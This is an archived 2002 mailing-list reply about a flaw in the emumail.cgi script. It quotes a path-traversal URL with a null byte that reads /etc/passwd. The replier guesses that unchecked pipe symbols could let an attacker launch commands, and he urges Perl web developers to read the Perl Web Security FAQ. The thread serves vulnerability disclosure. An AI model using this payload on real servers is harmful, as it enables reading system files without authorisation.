Re: emumail.cgi

From: Randal L. Schwartz (merlynat_private)
Date: Tue Apr 09 2002 - 12:14:17 PDT

    MegaHz> u can also do this:
    MegaHz> http://site/emumail.cgi?type=/../../../../../etc/passwd%00

    MegaHz> but u cannot do this:
    MegaHz> http://site/emumail.cgi?type=/../../../../../bin/ls%20/%00

    It's Perl, so I bet they didn't check for pipe symbols at the
    beginning and ending either.  That can launch things.

    I wish people who write Perl code for the net would at *least* read
    the Perl Web Security FAQ *at a minimum*, or hire an outside Perl
    company (like Stonehenge :) to vet the code.

    <merlynat_private> <URL:http://www.stonehenge.com/merlyn/>